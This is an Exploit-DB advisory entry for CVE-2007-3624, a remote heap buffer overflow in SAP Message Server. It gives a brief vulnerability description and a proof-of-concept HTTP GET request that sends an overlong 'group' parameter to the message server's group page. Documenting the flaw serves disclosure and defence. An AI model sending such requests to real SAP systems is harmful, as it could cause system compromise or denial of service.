SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability

2007-07-05T00:00:00
ID EDB-ID:30265
Type exploitdb
Reporter Mark Litchfield
Modified 2007-07-05T00:00:00

Description

SAP Message Server Group Parameter Remote Buffer Overflow Vulnerability. CVE-2007-3624. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/24765/info

SAP Message Server is prone to a remote heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.

Remote attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will result in a complete compromise of affected computers. Failed attacks will likely result in denial-of-service conditions that disable all functionality of the application. 

GET /msgserver/html/group?group=**498 bytes** HTTP/1.0
Accept: */*
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)
Host: sapserver:8100
Proxy-Connection: Keep-Alive